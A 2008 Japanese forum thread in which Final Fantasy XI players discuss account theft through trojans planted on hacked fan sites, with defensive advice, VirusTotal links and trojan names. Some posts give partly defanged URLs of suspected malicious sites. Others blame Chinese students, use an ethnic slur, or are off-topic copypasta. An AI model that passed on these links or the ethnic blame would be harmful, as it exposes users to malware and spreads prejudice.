683 名前:既にその名前は使われています:2008/08/11(月) 20:31:38 ID:FB4xiLyY
これまでも、昼休みとかに同じPCで遊んでましたー(´・ω・`)いままでなんともなかったんで、たいして気にもしてなかったんですが・・自業自得だけど、いまパニってます(´Д⊂


684 名前:既にその名前は使われています:2008/08/11(月) 20:32:46 ID:3/rEOqYK
>>679
ごく単純に最終バックアップの次点に戻すはず

685 名前:既にその名前は使われています:2008/08/11(月) 20:36:40 ID:1h2xZmKF
>>678
以前、確かに隔離したファイルがあったのは記憶してるんですが、

感染してる→焦ってカスペインスコ→アンチヴァイラスを消さないとダメ→証拠隠滅

で、残ってない気が。

直前にPOL立ち上げたら、
pol.exeに干渉しようとするDLLをVISTAがブロックしてたので慌ててしまい、
ファイル名とか残してないのですよ。

これだから素人は、、、

帰ったらちょっと見てみますわ。

686 名前:既にその名前は使われています:2008/08/11(月) 20:36:58 ID:8jN8ezSF
業者いいばっかりじゃないかよw
キャラ巻き戻し時に、宅配とかトレードでどういうつながりが
アカウントハックの際にあったのか調べて、芋づる式に摘発とかできんのかぜ

687 名前:既にその名前は使われています:2008/08/11(月) 20:37:03 ID:zHrKq+OX
巻き戻しが2ヶ月前の報告もあります

688 名前:既にその名前は使われています:2008/08/11(月) 20:39:13 ID:2sqaLb++
これって問題の罠埋め込まれてるサイトが外部から不正にアクセスされてサイトを書き換えられたって事?
それとも、ユーザーじゃなくてもサイト更新できるのが仕様なの?

689 名前:既にその名前は使われています:2008/08/11(月) 20:39:50 ID:6PIWGOeu
>>681〜684
そうなのでありますか。自分も昨年11月に垢ハックされ泣き寝入りした身であります

なんでたがかゲームでこんな事が起きるのでしょうね、、。

690 名前:既にその名前は使われています:2008/08/11(月) 20:40:21 ID:Pw1j2lk4
>>683
PSに保存したIDとPASSが弾かれるならほぼアウトだろうから、これを教訓に自重しましょう
キャラ巻き戻しは一度のみだからね、もう後はないよ

691 名前:既にその名前は使われています:2008/08/11(月) 20:41:17 ID:+keKJFaA
たかがゲームと思ってRMT放置、中途半端な対策を行った結果だな。

692 名前:既にその名前は使われています:2008/08/11(月) 20:41:49 ID:zHrKq+OX
>>688
不正にアクセスされてサイトを書き換えられた=ユーザーじゃなくてもサイト更新できる

っていうことです
サイトのセキュリティ依存ですね

693 名前:既にその名前は使われています:2008/08/11(月) 20:42:18 ID:y6DafzTu
>>688
おおむね前者
HP更新用のIDパスを盗んでログインして改竄したのではなく、もっと強引に
サーバーに侵入してhtmlをいじったって感じ。今は世界中のHPでやられてるよ

694 名前:675:2008/08/11(月) 20:43:50 ID:L0VWBc40
61.113.95.0/24ってAkamai Internationalってとこなんだけど
POLのバージョンチェックはスクエニのサーバーで完結しないのかな

POLでパス入れた後、ここにつなぎに行ってる人いる?

695 名前:既にその名前は使われています:2008/08/11(月) 20:50:58 ID:2sqaLb++
>>693
セキュリティが甘い方だから、というのではなく?
それは怖いことですね・・・

696 名前:既にその名前は使われています:2008/08/11(月) 20:52:16 ID:zHrKq+OX
>>694
PG2が弾くのは、ブロックリストにそのIPが入ってるからです
わたしのブロックリストにはそのIPが入っていないのでなにのブロックリストなのかが
わかりませんが、全IPブロックしてPOLだけ許可なら、そのブロックリストを外せば
いいと思いますよ

697 名前:既にその名前は使われています:2008/08/11(月) 20:53:08 ID:y6DafzTu
>>695
バスターの公式WEBが改竄されてMMOのハックウイルス仕込まれたことがあるよ
そりゃどこでも狙えるって訳ではなくて、何らかの穴や手段があるんだろうけど
個人運営のHPで管理人が気を付けていれば済むってレベルではなさそう

698 名前:696:2008/08/11(月) 20:55:56 ID:zHrKq+OX
って、単純に書いちゃったけどなんかちょっと違うな・・・
トラッキングかなにかが入ってるのかな?

699 名前:既にその名前は使われています:2008/08/11(月) 21:21:08 ID:yfAHc5lt
>>683
アカハクはパス抜かれ>即日ハック っていうのはここ最近のトロイの挙動見てれば無さげ
どこからかトロイ拾う→トロイがデータベースにパス送る→データベースのリストを元に業者が流れ作業で処理 だから
報告でも(先月辺りの前兆出るタイプなら)兆候が出てから1〜2週間後にやられた、ってパターンがけっこうある
「今までなんともなかった」んじゃなくって「もうすでに抜かれてて処理待ちだった」だけだったと思う

最近は「気付かないうちに抜かれる」手口がほとんどだから、安全が確保されてないPCでプレイするのは自殺行為だわ


700 名前:既にその名前は使われています:2008/08/11(月) 21:56:17 ID:iObT9MdG
>>618
XREA 1039045744:88 の確認されたサイト

吟遊詩人テンプレ:メニュー ヘッダー
 8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
 ?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
 8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
 8月9日00時00分頃〜8月11日00時00分頃

マップガイドトップに期間が書いてあったので更新。


>>635
XREAはPHPスクリプト(PukiWiki?)のせいだと言いたいみたいだけど、
忍テンプレはPHP使って無いし、今回の件については的外れな感じが。
XREAのFTPパスワードが全体的に抜かれて改竄された、っていうのが一番しっくりくるんだけど
そういうことはあり得るのかなぁ?

701 名前:既にその名前は使われています:2008/08/11(月) 21:57:58 ID:yfAHc5lt
・自動Windowsupdateしてるから大丈夫だろうと思っていたらトロイがすりかわっててUpdateできなくなってた
・白門モグから徒歩1分の路上で業者がアカハク品転売シャウトしてた
・POLがぐにゃりと強制終了したので再ログインしてみるとパスが変えられてた
・高額装備をしたPCがアカハクされ、凍結が解けたら裸で別鯖にいた
・他の端末で外部からログインした、というかログインした後からパスとかを変更する
・モグハウスまで業者に襲撃され、取引可も「エクレアも」全部換金された
・Flashplayer9.0.115.0から9.0.124.0までのバージョンの間に脆弱性を突かれた
・ウィルス対策ソフトメーカーなら安全だろうと思ったら、HP改竄されてトロイしこまれてた
・ウィルスソフトの1/3がアカハクウィルス未対応。しかもウィルス対策ソフトが入ってれば大丈夫という都市伝説から「そういう人ほど危ない」
・「そんな危険なわけがない」といって無警戒でブラウズしてたPCが2週間後アカハクされてた
・「貧乏プレイヤーならば襲われるわけがない」と言ってたユニクロ装備のPCが所持品を全店売りされ知らないLS付けてBOTにされてた
・最近流行っている手口は「人気サイト改竄」 無警戒のユーザーが次々引っかかるから
・無策のPCユーザーはアカハクにあう確率が150%。一度ハクられて(対策せずにログインして)またハクられる確率が50%の意味
・ピーク時の業者サーバーにおけるハッキングデータ蓄積数は1日平均500件、同種のトロイの送り先は少なくとも2ヶ所(被害数は×2)

702 名前:既にその名前は使われています:2008/08/11(月) 22:14:58 ID:sto4++40
普通にシャットダウンしたらPOLが異常終了してビビた

703 名前:既にその名前は使われています:2008/08/11(月) 22:24:55 ID:7BJ3ob0m
>>700
あるいは単純にXREAのrootが抜かれたw

704 名前:既にその名前は使われています:2008/08/11(月) 22:28:51 ID:9kaBAPAV
僕たちFFユーザーはだんだんと狭いインターネッツになってきましたね^^;

705 名前:既にその名前は使われています:2008/08/11(月) 22:57:08 ID:Rdd70fK0
ほんとド素人なんですが、新しいPCでまったくWebも見たりしなければ垢ハックはされない?


706 名前:既にその名前は使われています:2008/08/11(月) 23:03:47 ID:s/cQcYNu
>>705
メールは見るわけ? そのPCでさ

707 名前:既にその名前は使われています:2008/08/11(月) 23:04:04 ID:wllXEFUi
>>705
さぁ?お宅の環境次第じゃない?発売当初のwindowsXPとかなら能動的に
web見なくても物理的にネットに繋がっていればウィルスが勝手に侵入してくるし。

708 名前:既にその名前は使われています:2008/08/11(月) 23:08:06 ID:4gYW5ufy
>>705
同じLANにつながってるPCが複数台あったり
メール受信してたりしたら、感染する可能性はゼロじゃない。

709 名前:既にその名前は使われています:2008/08/11(月) 23:14:19 ID:7BJ3ob0m
USBメモリ経由で感染する奴とかいくらでもあるね

710 名前:既にその名前は使われています:2008/08/11(月) 23:16:54 ID:yfAHc5lt
某社のUSBメモリに出荷段階でアカハクウィルス入ってたこともあったしのう

711 名前:既にその名前は使われています:2008/08/11(月) 23:18:11 ID:74yxQZ+b
ノートンで反応するのですが
詳細分かる方だけクリックお願いします。
なんか仕掛けられているかも知れません。

リネージュ2の情報サイトのむぶろぐなのですが
ttp://mutukina.net/

stardustddns.game-server.ccというところからデータが転送されているようでノートンで警告が出ます。
詳細わかるかたいらっしゃいますでしょうか?

712 名前:既にその名前は使われています:2008/08/11(月) 23:33:23 ID:Rdd70fK0
メールも使うつもりはないですね。完全FF専用予定です。

713 名前:既にその名前は使われています:2008/08/11(月) 23:37:06 ID:QQA8Vw4+
>>675
うちは普通に>>10にあるリストを許可しただけで繋がってる
他のアドレスを追加しないとFFに繋がらないのはちょっと変だな

714 名前:既にその名前は使われています:2008/08/11(月) 23:39:15 ID:zXtTBRlk
>ノートンで反応するのですが
>詳細分かる方だけクリックお願いします。
何がどう反応してるのかわからなきゃ誰も答えられないでしょ。
そういうのは 鑑定スレみたいなとこで聞きなさい。
第一リネのブログをここで聞くのってどうよw

>>635>>700
黒魔メモは改ざんされたのが rootのpukiwiki.phpとindex.php(ジョブ板参照)でパーミッションが604だったらしいから
サーバのphp設定のスキをつかれたってのは納得。
吟テンプレのほうは設置してるwikiで静的サイトを生成してたのかってのと
忍テンプレが基本的に静的サイトだから改ざんルートが気になるとこだよね。

715 名前:既にその名前は使われています:2008/08/11(月) 23:39:54 ID:7BJ3ob0m
>>711
ttp://jbbs.livedoor.jp/game/7135/

716 名前:既にその名前は使われています:2008/08/11(月) 23:40:51 ID:rNz5D0bw
検索してたら「FF11情報局-FFXIアルタナの神兵を徹底攻略」ってサイトを見つけたんですが、
昔あった「花の雫FF11情報局」って罠サイトと名前が似てるなーと思い出したんです。
aguseで調べたら日本のドメインでしたが、このサイト大丈夫なんでしょうか?

ttp://event.surpara.com/ff11/

717 名前:既にその名前は使われています:2008/08/11(月) 23:46:06 ID:7BJ3ob0m
鑑定は他でやってくれ

718 名前:675:2008/08/11(月) 23:46:08 ID:L0VWBc40
>>713
カスペオンラインスキャンしたんですが特に何も見つからず。
61.113.95.0/24のAkamai Internationalのサーバの場所は東京らしいです。
ここをブロックしたままだと「プレイオンラインビューアー」のバージョンをチェックしています」とで続け
さらにそのまま放置すると「バージョンアップ通信エラー」(POL-1160)が出るので終了を押すと
「バージョンアップに失敗しました」と出ます。
PG2のログを見ていると、POL起動直後にもつなぎに行っていますね。
気持ち悪いです。

719 名前:既にその名前は使われています:2008/08/11(月) 23:47:01 ID:Yx5rt1fC
怪しいURLそのまま貼るなw

720 名前:既にその名前は使われています:2008/08/11(月) 23:49:34 ID:yfAHc5lt
>>716
危険なドメインな可能性があるなら「.」を「■」に変えるなりしなされ
頭のh削ったくらいじゃ専ブラ使ってると直リンしちまうんだよ

でもってここは勇気が無くて踏めないスレじゃねえ

721 名前:既にその名前は使われています:2008/08/11(月) 23:51:00 ID:zXtTBRlk
>>675 自分で少しは調べなよ
ttp://www.akamai.co.jp/jp/html/casestudy/case_study_square_enix.html
スクエニは アカマイのインフラ使ってる

722 名前:既にその名前は使われています:2008/08/11(月) 23:53:48 ID:MlZtxA0f
Akamaiサーバーってバスター

723 名前:既にその名前は使われています:2008/08/11(月) 23:55:07 ID:MlZtxA0f
途中でで送信してしまった
Akamaiサーバーってバスターとかも使ってる有名なサーバーですよ

724 名前:既にその名前は使われています:2008/08/11(月) 23:55:10 ID:zXtTBRlk
補足
アップデート用のキャッシュファイルを置いてるんだと思うよ
675の polなりffxiのバージョンが最新じゃないから アカマイからDLしようとしてる
それをブロックするからバージョンアップエラーが出る
polとffxiのバージョンを確認してみたまえ


725 名前:既にその名前は使われています:2008/08/11(月) 23:55:23 ID:jhDHiiPk
鑑定はこっちでどうぞ

http://pc11.2ch.net/test/read.cgi/hack/1208760889/

726 名前:既にその名前は使われています:2008/08/11(月) 23:56:14 ID:M0NbImNx
どーでもいいけどpukiwiki1.4.7(最新版)じゃpukiwiki.phpはindex.phpと統合されたから特に必要なファイルじゃなくなったんだよな
とか言ってみる

727 名前:716:2008/08/11(月) 23:59:38 ID:rNz5D0bw
ごめんなさい、初めてだったのでどうしたらいいかわからなくて。
鑑定スレ行ってみます。ありがとうございました。

728 名前:既にその名前は使われています:2008/08/12(火) 00:03:01 ID:o6vKIM3D
やられた…

729 名前:既にその名前は使われています:2008/08/12(火) 00:16:17 ID:kYz4Nzr2
>>727
このサイト、初期のころからあるサイトだな。
多分中華が名前パクったんだと思うよ。
とはいえ、丸ごとサイトコピーしてなり済ましてるかもしれないから
どんなサイトでも注意しといた方が。

730 名前:675:2008/08/12(火) 00:23:16 ID:tWqawtp5
>>721>>723>>724
ありがとうございます。

すいません。
アカマイとか聞いたことなくて;
とりあえずPOLのバージョン確認しましたがVer.1.18.10eでした。
能動的にUPDATEすることができなくて最新かはわからなかったですが
特に問題ないようなので許可することにします。

731 名前:既にその名前は使われています:2008/08/12(火) 00:30:19 ID:wSMfEd0b
フレがハックされてGMコールしたらpolのGMコールでのログイン制限のかけ方教わって凍結した。
でも、あれの本人からの依頼確認の要件って、なんか悪用され易そうでこわい。
下手すると、嫌いなやつとかに嫌がらせするやつが出てくるかもしれん。

732 名前:既にその名前は使われています:2008/08/12(火) 00:30:47 ID:rXX76NIq
業者もむかつくがRMでギル買ってる奴にも殺意覚えるわ
買う奴がいるから業者がいるわけだしな。

733 名前:既にその名前は使われています:2008/08/12(火) 00:34:58 ID:NGS22e+2
アメ公がいっぱい買ってるんだよな

734 名前:既にその名前は使われています:2008/08/12(火) 00:35:56 ID:NtzPsE/N
俺も今日垢ハックされた身
リアフレの情報によると今もとあるところで活動中とのこと
まあこれを機にやめる踏ん切りがついたわけだけどやめる前にこれだけはやっておけ!ってことありますか?


735 名前:既にその名前は使われています:2008/08/12(火) 00:37:01 ID:tWqawtp5
>>734
クレカなら
カード会社に電話してとめてもらう

736 名前:既にその名前は使われています:2008/08/12(火) 00:38:06 ID:moOWPCGr
マップサイトで食らって俺もやられたよん。
さっさと解約させて欲しいが、GMの対応おせー。
俺のキャラもヴァナで活動中らしい、印章でも使ってるのかなw

737 名前:既にその名前は使われています:2008/08/12(火) 00:40:22 ID:ldcnPzIu
カードはまずはスクエニに話しつけたほうがいいぞ。
申告しない限り垢ハックとは分からないからスクエニとしては正規の請求として上げるはずです。
となるとカード止めても有効な請求と見なされて請求が来ちゃう場合もあるので。

738 名前:既にその名前は使われています:2008/08/12(火) 00:42:24 ID:NtzPsE/N
>>735
ウェブマネーなのでその辺は大丈夫だと思います。

>>736
自分のキャラはなんかダンジョンでPT組んでましたよw
サーチしただけじゃ分からなかったけどPT全員垢ハックされたキャラなのかな〜

739 名前:既にその名前は使われています:2008/08/12(火) 00:45:12 ID:2blWucZx
やっぱネトゲでクレカ使うもんじゃないな
つーか垢盗まれるとクレカまで勝手に使われるってスクエニぐらいじゃね?
普通はクレカ登録しててもアイテム買う度にクレカ番号は入力させられるよな

740 名前:既にその名前は使われています:2008/08/12(火) 00:46:52 ID:4/4CIjDx
RMTは規約違反ではあっても違法ではないからなぁ
そもそも業者自体が野放し同然で、RMT利用者への罰も見て取れない時期が
長すぎた、特にNA入ってきてから客が増え、FF11ギルのRMT市場が完全に
出来上がった、この時点でSTTだの月次発表だの、後から手を打っても焼け石に水

741 名前:既にその名前は使われています:2008/08/12(火) 00:47:47 ID:qjegPAtA
この際クレカ番号もパスワードと一緒で「保存する/しないで毎回入力」の選択制にすればいい

742 名前:既にその名前は使われています:2008/08/12(火) 00:51:22 ID:cPfiN4NV
>>734
きっちり退会手続き、復帰する気が無いならこれ大事

743 名前:既にその名前は使われています:2008/08/12(火) 00:53:08 ID:qJLmg1q0
>731
少し前まではそういう悪用を恐れて「本人以外からの凍結依頼は×」だったのを
あまりにハック被害がひどいから、本人から依頼された他人でもOKにしたんだよね
凍結する前に、一応tellで問いかけとかしてると思いたいけど

744 名前:既にその名前は使われています:2008/08/12(火) 01:03:35 ID:joGWKnEH
TVで面白がってRMT市場1500億とか言ってるけど
この大半は垢ハックで稼いだ金なんだよな。
人から盗んだアイテム売り飛ばして市場も糞もねーよな


745 名前:既にその名前は使われています:2008/08/12(火) 01:09:20 ID:QsU99vbQ
しかしキャラ取られたやつはしっかり取り返せよ。
被害者であると同時に加害者なんだからな。

746 名前:既にその名前は使われています:2008/08/12(火) 01:18:26 ID:moOWPCGr
もう退会するからキャラとかどうでもいいわ。
しったこっちゃねーよw

747 名前:既にその名前は使われています:2008/08/12(火) 01:18:27 ID:ldcnPzIu
>>739
> 普通はクレカ登録しててもアイテム買う度にクレカ番号は入力させられるよな

それだとクレカ登録する意味がないw

748 名前:既にその名前は使われています:2008/08/12(火) 01:32:43 ID:5bedcXmV
毎日カスペルスキャンしないと不安で寝れないカラダになった

749 名前:既にその名前は使われています:2008/08/12(火) 01:35:34 ID:kksDtLGT
垢ファックされた装備とりもどすのにRMTした俺がポップwwwwww


750 名前:既にその名前は使われています:2008/08/12(火) 01:36:31 ID:qjegPAtA
>>749
洗面所に行って鏡に向かって「RMTer市ね」って言って来て

751 名前:既にその名前は使われています:2008/08/12(火) 01:47:10 ID:WYdJW93x
ジラードからコイツでやってきただけに、愛着あるから、せつねぇ(´Д⊂
自分が悪いのカモだけど、なんでこんなことすんだーバカヤロー(ノ ゜Д゜)ノ == ┻━┻

752 名前:既にその名前は使われています:2008/08/12(火) 01:59:03 ID:kYz4Nzr2
いつのまにか専門的な知識必要になってるし、今回のは仕方ない。
自分も防ぐ自信ないしPC版だったら今頃感染してぬかれてる。
愛着あるキャラがBOTになってたとかショックだろうし。

753 名前:既にその名前は使われています:2008/08/12(火) 02:05:47 ID:NGS22e+2
>>751
ジラー「ト」なんだぜ

754 名前:既にその名前は使われています:2008/08/12(火) 02:14:35 ID:1uo1rqJ+
日本へ奨学金でプログラムを学びに来た中華がハックしまくってるからな
日本で学んだ技術を本国へ戻って犯罪に使う。日本政府の思惑通りじゃないですか

755 名前:既にその名前は使われています:2008/08/12(火) 02:15:09 ID:cRdaKwxO
つか今月になってやられたやられた言ってるやつって
テンプレの対策はしてたの?

756 名前:既にその名前は使われています:2008/08/12(火) 02:28:13 ID:Na4GuiVw
>>755
してない人いっぱいいると思う
ネ実のこの板に居たってこのスレ見てない人多そうだし
バスター系ソフト入れてれば大丈夫だと思ってる人いっぱいだね
FFAHとかマップサイトとか、URLをナマのままペタペタ張ってるスレ多い

757 名前:既にその名前は使われています:2008/08/12(火) 02:33:55 ID:hYYxI/cZ
マップサイトも危ないのか
あんな画像を表示させるだけのサイトも危険なの?

758 名前:既にその名前は使われています:2008/08/12(火) 02:35:38 ID:cRdaKwxO
だよなぁ、2回目やられたって人聞かないから
対策してれば乗り越えられたってことだろうしなぁ

759 名前:既にその名前は使われています:2008/08/12(火) 02:36:42 ID:3CRl2nX4
カスペルスキーオンラインスキャンしたら、Eドライブに14個も感染見つかってワロタ
どうなってんだ

760 名前:既にその名前は使われています:2008/08/12(火) 02:42:18 ID:qTHUdIIO
カスペにしてからFFしてるとフリーズすることが増えた

761 名前:既にその名前は使われています:2008/08/12(火) 03:25:25 ID:Su7jRKR1
>>757
穴があってアクセス数や知名度多い所を狙ってくるから内容関係無い。

762 名前:既にその名前は使われています:2008/08/12(火) 03:30:13 ID:4/4CIjDx
そもそもマップサイトが画像を表示させるだけと認識してる時点で・・・
そのjpeg開くリンクはhtmlにあるんじゃないかと小一時間t(ry

763 名前:既にその名前は使われています:2008/08/12(火) 03:31:37 ID:hYYxI/cZ
htmlなら埋め込まれる危険性があるのかな?
もっとphpとか凝ったことしてることろが危ないのかと思ってた

764 名前:既にその名前は使われています:2008/08/12(火) 03:38:05 ID:bM7SypqP
>>759
結構誤反応でひっかかってるだけってのも多いぞ

765 名前:既にその名前は使われています:2008/08/12(火) 04:24:49 ID:Na4GuiVw
>>759
とりあえず引っかかったのをカスペルスキーに投げて誤検出なのか
ほんとうにウィルスなのかを確認したほうがいいですね
わたしはそれがめんどいからカスペルスキー使ってないです

766 名前:既にその名前は使われています:2008/08/12(火) 08:12:09 ID:bWEoMwJo
肺ガンの苦しみって知らないの?
あれは見ている方もつらいもんだよ。
とにかく息が出来なくて苦しいんだよ。精一杯はぁはぁやってるけど
肺が酸素をあまり吸収してくれないから24時間ずっと息が苦しい。
溺れてるかのように空気を求めてのたうちまわる。
単純に痛いのなら痛み止めで楽になる。他の苦痛も麻酔や麻薬の
ようなもので苦痛を取り除くことは出来る。でも息が苦しいのは
どうしようもない。酸素を肺に送り込んでもその肺の機能が低下
している以上苦しいのは解消しない。症状が悪化するに従って
ひどくなる。まるでベッドで長期間溺れているようだ。
痛みはごまかせるけど、末期の肺癌は、肺が酸素を取り込まなくなってるから。
呼吸出来なくなる→ちょっと呼吸できる→呼吸出来なくなる→以下、死ぬまで繰り返し
拷問で殺される以外で、最も苦しい死に方。

767 名前:既にその名前は使われています:2008/08/12(火) 08:47:45 ID:ekoaK+sE
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    使わないなら削除しよう!
WindowsUpdate   常に最新にしよう!
パスワード    は保存しない!

768 名前:既にその名前は使われています:2008/08/12(火) 09:30:51 ID:R/BMTcnj
>>700>>714
忍テンプレは表では使ってないけどPHP自体は使える状態だったと思ってる
使えるものは使えるようにしておきたい、でもメンテナンスはしない
日本人によくある欲張り思想だなw

769 名前:既にその名前は使われています:2008/08/12(火) 10:22:20 ID:IR1yNkJm
  Trojan-GameThief.Win32.OnLineGames.biuv"
これって何?w

770 名前:既にその名前は使われています:2008/08/12(火) 10:27:59 ID:SWCeQ/U/
>>769
名前見たとおりだと思うが...

771 名前:既にその名前は使われています:2008/08/12(火) 10:28:28 ID:xK4vrGyy
>>769
今回のxreaサーバ事件で感染するやつらしい
http://www.virustotal.com/analisis/8e2651443274b5a034e5d6c69e8fefd9

出典:
http://pc11.2ch.net/test/read.cgi/sec/1216217642/156

772 名前:既にその名前は使われています:2008/08/12(火) 10:37:16 ID:IR1yNkJm
やっぱりそうかー
プレイオンラインに入れないですw
パスワードが違うそうでw

どこで拾ったんだろうw
取り合えず相談してみるー

ありがと〜

773 名前:既にその名前は使われています:2008/08/12(火) 10:48:11 ID:0yYcUu2r
XREAはどのサーバでもphpはインストールされてて
最古の鯖でもphp4.4以降だったはず。
register_globalsの設定は4.2以降はデフォルトがoffのはずなのに
offに設定しろって言われるってことは XREA側でonに直してるってことなのかな。
オートインストールできるxoopsが最新バージョンじゃないことだし
とりあえず XREA使ってる人はphpinfo確認したほうがよさそう。

んで ちょろっと忍さんのテンプレサイトのソースをみてたんだけど
FAQページの一番下 文字色白で見えなくしてるところに
コメントアウトして出会い系のリンクしこまれてるのと
ファミ通への抗議署名サイトの飛び先が改変されてる
アカハクとは関係ないし
改ざんされたのか クライアントでそうしてるかは不明だけどね。

774 名前:既にその名前は使われています:2008/08/12(火) 10:53:10 ID:uJ/qW/xt
>>772
どの程度の対策してたか参考までに教えてくれまいか?

775 名前:既にその名前は使われています:2008/08/12(火) 10:54:01 ID:xl+dHBlQ
マップガイドしょっちゅう見てたから俺もやべー!!
パスワード変更するだけじゃダメですか・・・?

776 名前:既にその名前は使われています:2008/08/12(火) 11:01:31 ID:IR1yNkJm
>>774
PCの設定は全然知らなくて、今回のことで
無料のウィルススキャンをしてみたらひっかかったんです
一応そのまま削除できたので削除しました。
スキャンした場所はニフティでw
パスワード変更もしていないし、いつも自動ログインしてましたw

あんまり詳しくなくてごめんねー
これじゃあ自業自得だとおもうw


777 名前:既にその名前は使われています:2008/08/12(火) 11:02:34 ID:xl+dHBlQ
>>701
ヨハネスブルグのガイドライン改変かこれww

778 名前:既にその名前は使われています:2008/08/12(火) 11:08:26 ID:gM70EMnp
>>775
不安を感じるならハードディスクフォーマットして一からクリーンインストールだ

779 名前:既にその名前は使われています:2008/08/12(火) 11:12:24 ID:uJ/qW/xt
>>776
なるほどなー><;
ありがとん

780 名前:既にその名前は使われています:2008/08/12(火) 11:13:44 ID:xl+dHBlQ
>>778
バックアップ取らなきゃいけないデータ山ほどあるし
クリーンインスコも気軽にできるもんじゃないよなぁ

んで被害にあってから後悔するんですね わかります

781 名前:既にその名前は使われています:2008/08/12(火) 11:15:56 ID:gM70EMnp
バックアップがめんどくさいなら
とりあえず新しいPC買ってくるって手もあるぜ

782 名前:既にその名前は使われています:2008/08/12(火) 11:20:57 ID:8mwMTfBK
外付けHDD2台買って、データはその1台に保存し、週1くらいでさらにもう1台のほうと同期。
いまUSBの奴とか容量大きくてすごく安い。
システムドライブはクリーンインストール後をディスクイメージで保存しといてたまにリストア&VUかなあ

783 名前:既にその名前は使われています:2008/08/12(火) 11:25:56 ID:xl+dHBlQ
スクエニには気楽にゲームできる環境作りをがんばってもらいたいわ
でも自衛もできないやつはネットすんな!って言われちゃいそうだなw

実際被害にあって泣き寝入りというか、そのまま辞めちゃうプレイヤーだっているだろうし
スクエニも本気で対策に乗り出してほしい もうしてるんだろうか


784 名前:既にその名前は使われています:2008/08/12(火) 11:38:43 ID:rWfCQiFQ
クリーンインスコなんて面倒なのは最初だけだ。
2度目からは痛くなくなるぞ。
3度目以降はヤる毎にエクスタシーを感じるようになる。
さあやれ。いますぐやれ。

785 名前:652:2008/08/12(火) 11:44:52 ID:yMj7L165
不正チャットでパス変更してもらってから、ドキドキしてログインしたけど被害は喰らって
ませんでした。ログアウトした場所も変わってなかったです。どうやら新しいパス変更を間違えて
登録した模様です。アドバイスくれた方々ありがとうございました。

786 名前:既にその名前は使われています:2008/08/12(火) 11:45:11 ID:PnBHOhdn
>>783
頻繁に注意喚起してるじゃん。
その結果、引っかかってるのが>>776みたいな人なので仕方ないでしょ。

787 名前:既にその名前は使われています:2008/08/12(火) 11:54:26 ID:MqAOymsX
ちょっと質問ですがハック食らった人でパス手動入力の人もいる?

788 名前:既にその名前は使われています:2008/08/12(火) 11:59:49 ID:Ja4I/lsn
>>787
前は居た。
POLに細工されてたから、どんな方法使ってもログインするだけでハックされてた。

789 名前:既にその名前は使われています:2008/08/12(火) 12:04:42 ID:cPfiN4NV
スクエニがいくら環境を作ろうがエンドユーザーのプレイヤーが何もしてなきゃ意味ないわな

それぐらいFFやってる奴の危機意識が低いって事だ

790 名前:既にその名前は使われています:2008/08/12(火) 12:07:30 ID:qd131Z+Z
オレも今回アカハックされて危機意識に目覚めたと同時にゲーム熱が醒めた
いいゲームが見つかるまで、もうやらんw

791 名前:既にその名前は使われています:2008/08/12(火) 12:13:19 ID:gM70EMnp
>>787
沢山いる

今やられてるやつは
キー入力を監視したりローカルに保存されてるデータを読んだりするのではなく
POLビューアの通信そのものを横取りしてるので
入力方法やパス保存の有無に関わらず抜かれるぽ

792 名前:既にその名前は使われています:2008/08/12(火) 12:16:27 ID:/3ujoU1G
不正チャット、混雑中で利用できませんって出てくるんだけど、
この時間はいつもこんなもん?

793 名前:既にその名前は使われています:2008/08/12(火) 12:18:11 ID:cPfiN4NV
しかも今被害にあってる奴は被害よりもかなり前に感染してるはずだからな

潜在的ハック被害者はもっと多いんだと思う、言わば中華のレジに順番待ちしてる状態
PCの異常に気がついて検索なりすればここに流れてくることもあるだろうが

794 名前:既にその名前は使われています:2008/08/12(火) 12:21:29 ID:MqAOymsX
>>788>>791
そっかーありがとー


795 名前:既にその名前は使われています:2008/08/12(火) 12:28:46 ID:DOg2tyOI
>>793
多分そうだろうね。
一人のアカウントから全財産を剥ぎ取るのに、1時間はかかるだろうし、
それ考えると、一人の担当業者wが処理できるのは一日に十件くらいか?
順番待ちの潜在的な被害者は、まだまだ居るんだろうな。


796 名前:既にその名前は使われています:2008/08/12(火) 12:32:05 ID:3UdKgtYP
FFに関して言うなら>>783のいうところの「気楽にゲームできる環境作り」ってコンシューマ機でやって
ID・パスを一切入力をしないで実現できるじゃんw

797 名前:既にその名前は使われています:2008/08/12(火) 12:47:47 ID:NGS22e+2
先週XREAに仕掛けられたトロイが更新。
ttp://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
× Norton McAfee バスター AntiVir avast AVG BitDefender ソースネクスト(笑) 他多数
これはひどい…。各社に提出済み。

798 名前:既にその名前は使われています:2008/08/12(火) 12:50:49 ID:R3cEuHAo
>>797
まだまだ被害者増えそうですねw
こんなスレ被害にあってからじゃないと見ねーしw

799 名前:既にその名前は使われています:2008/08/12(火) 12:56:17 ID:FT168A6p
問題のウイルス置き場IPとその周辺IPをルーターでブロックするようにしたけど・・・
短期間で変更されたり増やされたらもうお手上げだ
アンチソフトメーカーも対応が追いついていないし
HTMLの直接改ざんに及んでいるからクライアント側は対応がかなり厳しいよ

800 名前:既にその名前は使われています:2008/08/12(火) 13:00:14 ID:RtRMH9Nl
>>797
カスペルスキー強いな、製品版そろそろ買うか。ッて言うかトロイが更新、ッて凄く嫌だなw

801 名前:既にその名前は使われています:2008/08/12(火) 13:03:14 ID:FT168A6p
>>800
敵さんも感染拡大を常に狙っているわけですな
アンチソフトメーカーの動向もチェックしてるだろう

802 名前:既にその名前は使われています:2008/08/12(火) 13:21:15 ID:wRXfyxuJ
>>784
ほんとその通り。
1度目はなんでこんな・・;;って辛いけど
2度目はカンタ〜〜ンw
なぜかドライブのクリーン時間も短くなる。
(パーティション領域変えてないの不思議)
まだエクスタシーを感じないけど、
さあやれ。いますぐやれ。だよwww
多少D領域作っておくとバックアップも楽だよ。
時間かかるから、部屋の掃除とか兼ねるといいよw
DVD用意しとくのもお勧めw

803 名前:既にその名前は使われています:2008/08/12(火) 13:30:18 ID:17CWOzyq
■eの不正アクセス専用チャットに入ろうとすると

「現在、混雑のためチャットサポートはご利用いただけません。
お時間をおいて再度お試しくださいますよう、お願い申し上げます。」

と出る。平日の昼間だけしか対応してくれない上にこの状態。
退会するだけのためにこれだけ労力を払っているのが
アホらしくなってきた


804 名前:既にその名前は使われています:2008/08/12(火) 13:31:40 ID:dU77gLFf
